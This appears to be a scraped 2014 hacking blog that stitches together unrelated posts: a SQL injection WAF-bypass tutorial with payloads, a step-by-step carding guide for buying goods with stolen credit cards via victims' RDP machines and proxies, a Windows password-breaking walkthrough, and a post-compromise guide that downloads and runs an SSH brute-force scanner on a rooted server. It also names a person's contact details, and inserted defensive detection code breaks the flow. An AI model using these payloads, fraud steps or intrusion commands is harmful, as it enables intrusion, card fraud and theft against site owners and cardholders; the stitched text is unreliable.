Hello ! 

Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let's Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL injection (usually the "UNION SELECT" command), you get a 403 error (and the website says "Forbidden" or "Not Acceptable").


Example:

Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF...

1) Comments:
You can use comments to bypass WAF:

Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAFs detect this method, so they still show a "Forbidden" error...

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAFs!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the "UNION SELECT" Statement when it is found in the URL... We can do this to exploit this function:

Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" :-D )
This method doesn't work on ALL Firewalls, as only some of them remove the "UNION" and the "SELECT" commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the "Union" and the "Select" Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic methods of WAF bypassing! Let's move on to more advanced ones...


Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....

If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))


2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the "Hex Encoded for URL" result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the "UNION SELECT" other commands might be blocked.
Common Commands Blocked:
Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! ;-)


4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with Whitespaces! What we can do is this:

Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:


Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)
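
Seen from the filter's side, the "Replaced Keywords" and "Misc Exploitable Functions" cases above both come from a firewall that rewrites a request once and then forwards it. The following is an added example, not code from the original post or from any WAF product: it contrasts that design with a check that canonicalizes the value and rejects it. The function names are hypothetical, and the inputs in the test are the strings quoted in the post plus constructed percent-encoded variants.

```python
import re
from urllib.parse import unquote_plus

# Flawed design: rewrite the request in ONE pass (delete the keywords and
# any '*'), then forward whatever is left to the application.
def strip_once(value: str) -> str:
    value = re.sub(r"union|select", "", value, flags=re.IGNORECASE)
    return value.replace("*", "")

VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)  # MySQL runs the body
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)            # behaves like a space
SEQUENCE = re.compile(r"\bunion\b.*?\bselect\b", re.DOTALL)
SKELETON = re.compile(r"union.*?select")

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Reduce a parameter value to the form the database would effectively parse."""
    for _ in range(max_rounds):              # undo nested URL encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED_COMMENT.sub(r" \1 ", value)  # keep the executable body
    value = PLAIN_COMMENT.sub(" ", value)
    return " ".join(value.lower().split())   # fold case, collapse whitespace

def verdict(value: str) -> str:
    """Decide on the canonical form and reject; never repair and forward."""
    canon = canonicalize(value)
    if SEQUENCE.search(canon):
        return "block"
    # Keywords split by filler characters that a later rewriting layer might
    # delete. This rule is deliberately broad and can flag ordinary text, so it
    # suits parameters such as a numeric page_id rather than free-form fields.
    skeleton = re.sub(r"[^a-z0-9]", "", canon)
    if SKELETON.search(skeleton):
        return "block-obfuscated"
    return "allow"

if __name__ == "__main__":
    # Strings quoted in the post; the last one is a constructed encoded variant.
    for sample in [
        "15",
        "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
        "-15 UNIunionON SELselectECT 1,2,3,4",
        "-15+uni*on+sel*ect+1,2,3,4",
        "-15 %55nION/**/%53ElecT 1,2,3,4",
    ]:
        print(f"{verdict(sample):17} strip_once -> {strip_once(sample)!r}")
```

For a parameter like `page_id`, an allow-list that accepts only digits, together with parameterized queries in the application, removes the need to recognise keywords at all.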

Advanced WAF Bypassing

By admin → Friday, January 31, 2014


A lot of people and members on this website dont know how to card, so i will do my best to explain basics of carding in this thread.


Dont be lazy, read it all!!!

First lets start on what you need:

1. Computer, macbook, laptop, etc...

2. A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it was directly connected to the private network, while benefitting from the functionality, security and management policies of the private network.[1] This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two.
( You got a lot of free vpn software on internet, or trial)
Here is link where you can get VPN software for free or premium ones 


http://www.start-vpn.com/tag/free-trial/

3. RPD - Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.
Clients exist for most versions of Microsoft Windows (including Windows Mobile), Linux, Unix, Mac OS X, iOS, Android, and other modern operating systems. RDP servers are built into Windows operating systems; an RDP server for Linux also exists. By default, the server listens on TCP port 3389.
Microsoft currently refers to their official RDP server software as Remote Desktop Services, formerly "Terminal Services". Their official client software is currently referred to as Remote Desktop Connection, formerly "Terminal Services Client"

You can connect to RDP by clicking on start menu - remote desktop connection - then type victims ip address. Example 74.7.42.89,click connect, now it will pop up screen asking for password and username which is in this case: User name: Shipping Password shipping1. Now click ok, and you will get access to Remote Desktop Connection - which means you are connected to someone computer and you will buy stuff from victims computer. Not YOURS!

4. Socks 5 SOCKet Secure (SOCKS) is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. SOCKS performs at Layer 5 of the OSI model (the ******* layer, an intermediate layer between the presentation layer and the transport layer).

You can get socks for free http://hidemyass.com/proxy-list/,
or you can buy fresh witch i reccomend 


http://www.vip72.com/?drgn=1


How to use socks5? Example of socks4/socks5 are 75.119.127.189:36871
Socks5 are very easy to use via Mozilla Firefox. First open Mozilla Firefox, next step
is firefox - options - advanced - network - connections - settings. Now the screen will pop up varius options like : 1. No proxy; 2.Auto Detect; 3.Use system proxy; 4. Manual proxy configuration. You mark 4. Manual proxy configuration. Now type in socks host IP you have, example Socks Host: 75.119.127.189 Port: 1080. Press ok and you are connected to secure socks5. Will explain more when we start carding.

5. Victims credit card, you can get a lot of free credit cards here on ABH, or you can buy one from variuos cvv shops that can be find on internet. Example off victims credit card:

Note: This is only example off victims credit card, you dont need all this information to card like DOB (date of birth) SSN (social security number) etc. Some sites ask only for card numbers, exp date and cvv2.

Now that you have all this above, lets start carding


Lets say we want free phone like Samsung S4, IPHONE 5, Sony Z etc...
First of all i want to recommend a website shop from your country. Why? Because you dont need to wait a lot for you package. In my country they delliver in 2 days, most 3 days. I am sure there is a lot of cell phones shops in any country. Use google and find it.

There is two types of shops, VBV and NON VBV:

VBV is a Verified by Visa, an online security system for credit card transactions. Which means you need to provide a card knowing a lot of victim credit card information such as DOB (date of birth), SSN (social security numbers), Secure password witch cc owner use for online purchase. You can check on shop is there a VBV VERIFIED BY VISA ICON on home page.

NON VBV is not verifired by visa card, you can buy anything with non vbv cards without going thru 3d verification process.

We leave now this for later.

1. Connect to your vpn software and chose ip - country you want.

2. Connect to RPD ( Remote Destkop connection), must be same country (IP), state as card holder Address. Do not forget that.

3. Now from your RPD, connect to socks5 via mozzila firefox, example 97.77.96.226 34539 United States, MUST BE SAME ASS CARD HOLDER: COUNTRY, STATE, CITY!

4. When you done all that, create email with same name as credit card holder name, same address, same city, and everything. Or if you got email access thats whould be a lot better .

5. Go to your website shop you want to card. ( dont be lazy and find a good yours private shop from your country or any other that ships worldwide).

6. Register with credit card holder information, name, country, city, address, and email you made one just for this ORDER.

7. Add a shipping address, some sites dont allow to ship to diffrent address but there is planty of shops witch do. Shipping address is where package will be dellivered. Which means you provide your address, girlfriend address, friend address, to your drop etc.

8. Select product you want, and click on check out, now it will ask for you know, how you will pay. Choose credit card, and type victims credit card numbers and other information needed.

9. Click order now, and i am sure 100000000000% they will confirm your order via email or you will get track your order on website, after pressing order.
(note that some sites need phone verification, but you can always buy phone number, confirm your order, and destroy it after they ship your item) its how i do it.

10. Wait for order to arrive to your shipping address, I personally use FEDEX, EURO EXPRESS, CITY EXPRESS. When they arrive they call me, and i can say difrent
adress where i want to pick up my order. Sign in with fake name you provided and run xDDDDDDDDD. Just joking. Be a calm down like you just stole 100 MILION US DOLLARS and take the package. Use item for you

Carding tutorial for complete amateurs!

By admin →
Assalamualaikum...

The previous BBM release was available only to users of Android ICS and later. Now Android Gingerbread users can enjoy it too, following the launch of a BBM build specifically for Android Gingerbread, which is still in beta. Even so, this BBM app runs well on Android Gingerbread. It works! Tested on Samsung Galaxy Young ARM 6.

BBM for Android 2.3 Gingerbread : Download


Installation steps:

Step 1 : First, download the BBM app :)

Step 2 : Then install BBM on your Android device

Step 3 : Open the BBM app, then tap Sign in!

Step 4 : Enter your BBM ID; if you don't have one yet, register first.

Step 5 : Create your profile name, then tap Continue

Step 6 : Keep tapping until the notifications that appear are gone.

Step 7 : Done! BBM is ready to use :)

That's the whole tutorial. If you run into any problems, ask by leaving a comment :)

Author : Onix AQua

Install BBM for Android 2.3 Gingerbread

By admin →

Install Blackberry Messenger

The launch some time ago of Blackberry Messenger, the messenger app made by RIM Motion, for Android and iOS has made the app highly sought after among social network users, given that it is the best-selling messenger app with the most users, who until then were connected only through Blackberry devices. All Android and iOS users can now use the app for free. Read more...

Install WhatsApp Messenger

WhatsApp is a chat messenger app intended for all kinds of mobile devices on every kind of operating system. The app runs on almost all mobile devices using operating systems such as Java, Windows Phone, Symbian, Android, iOS, BB, and several others. The only catch is that the app does not support use on a PC. But there is no need to worry, because it can be run with the help of an emulator. Read more...

Install WeChat Messenger

WeChat is a social media app for chatting, and it is currently very popular in Indonesia alongside BBM. The app itself runs on smartphones using operating systems based on Android, Windows, Mac, Symbian and Java. Read more...

 

Install Line Messenger

Line is a new app that can be used to make voice calls and send messages for free, whenever and wherever you are, 24 hours a day. Read more...


 

Install Kakao Talk

Kakao Talk is a smartphone messenger app for calls and messages. It can also send photos, videos, voice and location. Although the app is intended for smartphones, it can now be used on a PC. Read more...


Author : Onix AQua

How to Install the Messenger Apps BBM, WhatsApp, WeChat, Line and Kakao Talk on a PC

By admin → Wednesday, January 29, 2014


Assalamuallaikum, friends of Indonesian Cyber Army :D
Why is this post titled how to hack a woman's heart? Hahaha, because most visitors to this blog are men, so the title is simply "How to Hack a Woman's Heart" hehe :D

Okay, after reading a status that showed up on my timeline, I wanted to cover it on this blog too. Hacking generally only happens in the online world, right? Now let's try applying it to the real world :)

In the hacking world, when we take over a website there are steps such as:
Gathering Information > Scanning > Exploitation > Upload Backdoor > Deface > Archive
Winning over a woman has its rundown too. Okay, let's start :D

1. Gathering Information

Gathering Information, which you could also call the introduction stage. At this stage I hope you don't make any unnecessary mistakes. It's a good idea to find out about her before introducing yourself: for example, find out what she likes on social networks and what she gets up to; basically, have a look through her social network accounts. That way the introduction won't be boring :D. And for those of you who don't dare introduce yourselves in person, just try getting acquainted over social networks; who knows, you might get to meet :D

2. Scanning

Scanning: find out as much as you can about her, so you won't regret it later if you win her over, hehe. Find out everything from her habits, her favorite food and her favorite music, even when she goes to the toilet if you like, hehe :D. The point of this stage is to find out what you need in order to get closer to her. You can also ask her friends for help, since friends surely know what she likes :D

3. Exploitation

In the defacing world, Exploitation means executing a bug that has been found, but in matters of love it's different, bro :D. Exploitation in love means the getting-closer (PDKT) period. Of course: once we know what she likes, we win her heart. Give her extra attention, but remember not to overdo it, or she might lose interest in you, hahaha :D. Ordinary attention is enough, and don't expect too much at this stage. Many fail here because they rush to confess, thinking she is already head over heels for them, haha :D. Don't rush, bro, just relax, or you'll end up being led on (PHP), well, not really led on, more like flattering yourself, hahaha :D. Okay, let's move on; I'm sure you all know more about getting closer than I do :D

3. Upload Backdoor

This one is important, bro: at this stage, plant the seeds of love in her. You can start nudging her to like you, give her extra attention, and every now and then just say that you care about her. Okay bro, don't be shy :D. The point of this stage is to find out whether she already likes you or not; coax it out however you can, for example try being affectionate and test the waters with a :* emoticon (remember, at this stage I recommend being affectionate over SMS or similar; do it directly in the real world and it's not love you'll get but a punch, hahaha). Basically, just charm her, and once she responds, move on to step 4.

4. Deface

The introduction and getting-closer stages are done; now it's time to ask her out. Of course, what else? Do you want to lead her on? But remember, bro, do this stage only after you are sure she likes you; don't be like step 2 and end up just flattering yourself :D. You know how to ask, right? Take her somewhere romantic or somewhere "anti-mainstream" so that she sees you as a unique guy; basically, make sure she's impressed :D

5. Archive

This is the most important stage, bro, if she accepts your love. Don't forget to pay me a "new couple tax" once you're together, hahahha :D. Just kidding, bro. At this stage, capture the moment when you asked her out, or at least remember the date. As far as I know, most girls get annoyed with their boyfriend if he forgets their anniversary :D

Oh, and singles, a reminder: once you've managed to upload a shell in matters of love, don't try to symlink it or root it, or you'll get slapped :v wkakwkaw :D
Better to patch the bug so that no other attacker gets close to your girlfriend :)

That's all, bro, the tips for hacking a girl's heart :D If you have other ideas, feel free to leave them in the comments :D
Oh, and once in a while let's not be too serious in the hacking world, okay bro, hehe, consider this just an intermezzo :)
Thank you!

Author : Bimo Septiawan

How to Hack a Woman's Heart

By admin → Tuesday, January 28, 2014
Vega is a free and open source scanner and penetration testing platform for testing the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), disclosure of sensitive information, and other vulnerabilities. The scanner is written in Java, is GUI-based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and has a proxy feature for tactical inspection. The Vega scanner can find XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using an API in the language of the web: Javascript.

FEATURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model

Running this scanner requires Java to be installed.


Download Subgraph Vega Web Vulnerability Scanner :

Subgraph Vega Web Vulnerability Scanner

By admin → Sunday, January 26, 2014


Assalamualaikum wr. wb., Alvin Solissa here again. This time I want to share a bit about how to break a Windows 7 password with HBCD. To be fair, guys, I'm the type who likes to practice directly, without using a virtual machine (Workstation 9). Yesterday I tried cloning a Windows 7 OS onto a Samsung with a different mainboard, using two laptops as guinea pigs, with one Samsung belonging to my younger sibling from Bursel serving as the OS mastering server. Oh, and an AMD mainboard is best. Okay, no need for much small talk or I'll be called chatty again, hehehe! Let's go straight to the scene. Are you ready? Yes, I'm ready!

Okay, straight to the topic:

*First download the software here

1. Prepare the PC or laptop/netbook whose password will be broken

2. Also prepare your Hiren's CD; you can boot from a flash drive instead, the tutorial for that is here

3. If that succeeds, the screen looks like the one below; choose the "Password & Registry Tools" menu

4. Next, choose the "Active Password Changer v.3.0" menu (depending on the Hiren's version you downloaded), then wait for the process to finish and for a menu like the one in the following picture to appear:

Choose the "Choose Logical Drive" menu

5. Wait a moment, then select the partition that holds the OS, according to your hard disk layout

6. Next, wait while it searches for your Windows password database until it is detected; when the process finishes, the path where Windows stores the database appears, as follows:

7. To continue, press "Enter". In this step we choose the user name whose password will be broken

Select the user whose password is to be changed, then press "Enter"

8. Next, choose the account parameter to change

9. After that press "Y", then restart the PC or laptop and log in to Windows, now without any USER NAME & PASSWORD, bro! Good luck





How to Break/Hack a Windows Password with Hiren's Boot CD

By admin → Thursday, January 23, 2014
TARGET POS Malware author Sergey Taraspov russia
The Holiday data breach at TARGET appeared to be part of a broad and highly sophisticated international hacking campaign against multiple retailers, involving the heist of possibly 110 million Credit-Debit cards, and personal information.

Target confirmed last weekend that a malicious software was embedded in point-of-sale (POS) equipment at its checkout counters to collect secure data as the credit cards were swiped during transactions.

The malware, called 'BlackPOS' and also known as "reedum" or 'Kaptoxa', is an effective crimeware kit that was created in March 2013 and is available on underground sites for $1800-$2000.

Investigators from IntelCrawler found a 17-year-old hacker who actually developed the BlackPOS crimeware kit. His nickname is 'ree4' and original name: 'Sergey Taraspov' from St. Petersburg and Nizhniy Novgorod (Russian Federation).
IntelCrawler's sources mentioned that the BlackPOS malware was created in March 2013 and first infected the Point-of-Sales environments in Australia, Canada and the US.

Alleged Russian hacker and malware developer Sergey Taraspov (ree4) sold more than 40 builds of BlackPOS to cybercriminals from Eastern Europe and other countries.

BlackPOS is a RAM-scraping malware totally written in VBScript, i.e. it copies credit-card numbers from point-of-sale machines' RAM in the instant after the cards are swiped and before the numbers are encrypted.

In December, after the TARGET data breach, the Symantec antivirus firm discovered the malware and dubbed it 'Infostealer.Reedum.C'.
'He is a very well known programmer of malicious code in underground and previously he has created several tools used in hacking community for brute force attacks, such as "Ree4 mail brute", and also earned some first money with social networks accounts hacking and DDoS attacks trainings, as well as software development including malicious code.'
17 Year Old Russian hacker identified as BlackPOS Malware author, responsible for TARGET data breach
More details about Sergey Taraspov (ree4):
E-mail 1: ree4@list.ru
E-mail 2: ree4@yandex.ru
ICQ: 565033
Skype: s.r.a.ree4

Now any buyer of his toolkit is possibly the culprit behind the Target data breach. According to researchers, the attackers somehow managed to hack one of the TARGET servers and uploaded the POS malware to the checkout machines located at various stores.

IntelCrawler didn't accuse him of the Target heist, but said: "He is still visible for us, but the real bad actors responsible for the past attacks on retailers such as Target and Neiman Marcus were just his customers."

TARGET Data Breach developed by 17-Year Old Russian Hacker

By admin → Wednesday, January 22, 2014


Well i have watched so many times someone rooted a server and mass-deface it And i was like WTF? Why dont they use it for something ealse....Till today like i promised a Tutorial what to do after you got Root on the server 

So lets start What To Do Next?


-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible 


-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass  Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).

What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience


1st _...Putty...._


Download Link For Putty:

Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Download putty and connect to your hacked Server 

2nd. ~Scanner~

After we connect to our Victims PC(Server) we need to get a scanner.
Here is one 

[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command
Code:
wget http://www.freewebs.com/gbl-net/cristina.tgz

When the download finish we need to extrat this scanner from his file and for that we use
Code:
tar -zxvf scanner_name.tgz
in this case:
Code:
tar -zxvf cristina.tgz

Than we need to enter the folder where are the files from the scanner :
Code:
cd Scanner_Folder_Name
This case:
Code:
cd Cristina

And we give all files 777 permisions so they can be executed easly from anyuser not only root
Code:
chmod +x *

After we done all this we can start scanning now you can use from proxys ips am going to use
Code:
189.254.237.190
but we do not enter the whole IP we only enter the first 2 numbers
Code:
189.254
And now we start scaning by executing this:
Code:
./start 189.254

Now we wait till the scaning ends  After the scan ends its brute-forcing time its checking for user and password  and we still gonna to wait 
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:
Code:
cat vuln.txt
*Note: Non Of This Works..This is just to show you how it will looks!

Thank You For Reading This Tutorial If You Like It Feel Free To Comment!
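
The scan-then-guess sequence described in this post leaves a distinctive trail in the target's sshd log: a burst of failed passwords for several account names from one source, sometimes followed by an accepted login. The following is an added example, not part of the original post, showing one way to flag both events. It assumes the standard OpenSSH syslog message format; the function name, thresholds, year parameter and log lines are constructed for illustration, and the addresses come from documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH sshd password-auth results as written to syslog (auth.log / secure).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect(lines, threshold=4, window=timedelta(seconds=60), year=2014):
    """Return alerts for password-guessing bursts and for logins that follow one."""
    failures = defaultdict(deque)   # source IP -> (time, user) of recent failures
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                # not a password-auth result line
        # Classic syslog timestamps carry no year; 'year' is an assumed parameter.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        recent = failures[m["ip"]]
        while recent and ts - recent[0][0] > window:
            recent.popleft()        # forget failures older than the window
        if m["result"] == "Failed":
            recent.append((ts, m["user"]))
            if len(recent) == threshold:
                users = sorted({u for _, u in recent})
                alerts.append(("bruteforce", m["ip"], users))
        elif len(recent) >= threshold:
            # A success right after a guessing burst: treat the account as compromised.
            alerts.append(("login-after-bruteforce", m["ip"], m["user"]))
    return alerts

# Constructed sample log (not taken from any real system).
SAMPLE_LOG = [
    "Jan 22 10:15:01 srv1 sshd[2211]: Failed password for invalid user test from 203.0.113.7 port 40112 ssh2",
    "Jan 22 10:15:02 srv1 sshd[2213]: Failed password for invalid user oscar from 203.0.113.7 port 40118 ssh2",
    "Jan 22 10:15:03 srv1 sshd[2215]: Failed password for root from 203.0.113.7 port 40121 ssh2",
    "Jan 22 10:15:04 srv1 sshd[2217]: Failed password for invalid user guest from 203.0.113.7 port 40125 ssh2",
    "Jan 22 10:15:06 srv1 sshd[2219]: Accepted password for oracle from 203.0.113.7 port 40130 ssh2",
    "Jan 22 10:20:00 srv1 sshd[2301]: Failed password for alice from 198.51.100.20 port 51000 ssh2",
    "Jan 22 10:20:05 srv1 sshd[2301]: Accepted password for alice from 198.51.100.20 port 51000 ssh2",
    "Jan 22 10:21:00 srv1 CRON[2400]: pam_unix(cron:session): session opened for user root",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Key-only authentication (`PasswordAuthentication no` in `sshd_config`) removes the guessable secret altogether; the detection above is for hosts where passwords must stay enabled.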
                                   
                                           

what to do after root server

By admin →